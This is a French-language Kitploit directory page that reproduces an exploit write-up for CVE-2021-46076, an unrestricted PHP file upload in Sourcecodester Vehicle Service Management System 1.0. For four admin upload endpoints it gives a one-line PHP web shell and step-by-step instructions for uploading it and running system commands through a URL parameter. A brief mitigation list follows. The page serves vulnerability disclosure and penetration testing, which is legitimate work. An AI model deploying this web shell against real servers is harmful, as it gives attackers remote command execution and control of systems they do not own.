Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléchargement de fichiers. Un attaquant peut télécharger un fichier php malveillant sur plusieurs points de terminaison, ce qui conduit à une exécution de code. | Kitploit
Outils/GitHubGitHub/sanupl/cve-2021-46076
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsanupl/cve-2021-46076

CVE-2021-46076

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléchargement de fichiers. Un attaquant peut télécharger un fichier php malveillant sur plusieurs points de terminaison, ce qui conduit à une exécution de code.

Voir le dépôt
11il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-46076

Titre de l'exploit : Vehicle Service Management System - Le téléversement de fichiers « multiples » conduit à l'exécution de code

Auteur de l'exploit : SANU P.L

CVE : CVE-2021-46076

CVSS : 8.8 ÉLEVÉ

Références :

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

Description :

Sourcecodester Vehicle Service Management System 1.0 est vulnérable au téléversement de fichiers. Un attaquant peut téléverser un fichier php malveillant sur plusieurs points de terminaison (endpoints), ce qui conduit à l'exécution de code.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section My Account http://localhost/vehicle_service/admin/?page=user

Payload :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par ex. : Cmd.php
  2. Dans la section My Account, saisissez toutes les informations requises et parcourez le fichier php dans le champ Avatar.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par ex. : id, whoami, pwd, etc.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section User List et cliquez sur le bouton Create New.

Payload :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par ex. : Cmd.php
  2. Dans la page Create New User, saisissez toutes les informations requises et parcourez le fichier php dans le champ Avatar.
  3. Cliquez sur le bouton Save.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par ex. : id, whoami, pwd, etc.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Payload :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par ex. : Cmd.php
  2. Dans la section Settings, saisissez toutes les informations requises et parcourez le fichier php dans le champ System Logo.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image du System Logo dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par ex. : id, whoami, pwd, etc.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Payload :

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. Enregistrez le code php ci-dessus, par ex. : Cmd.php
  2. Dans la section Settings, saisissez toutes les informations requises et parcourez le fichier php dans le champ Website Cover.
  3. Cliquez sur le bouton Update.
  4. Ouvrez l'image du Website Cover dans un nouvel onglet.
  5. Ajoutez le paramètre cmd dans l'URL et exécutez les commandes.
  6. URL finale : http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. Exécutez toutes les commandes système, par ex. : id, whoami, pwd, etc.

Impact :

Un attaquant peut téléverser un fichier php malveillant sur plusieurs points de terminaison (endpoints), ce qui conduit à l'exécution de code.

Mesures d'atténuation :

Il est recommandé de mettre en œuvre les mesures suivantes :

  • N'acceptez jamais un nom de fichier et son extension directement sans disposer d'un filtre de liste blanche (white-list).
  • S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé de n'accepter que des caractères alphanumériques et un seul point comme entrée pour le nom de fichier et l'extension.
  • Limitez la taille du fichier à une valeur maximale afin de prévenir les attaques par déni de service.
  • Le répertoire de téléversement ne doit avoir aucune permission « execute » (exécution).
  • Ne vous fiez pas uniquement à la validation côté client.
Télécharger l’outil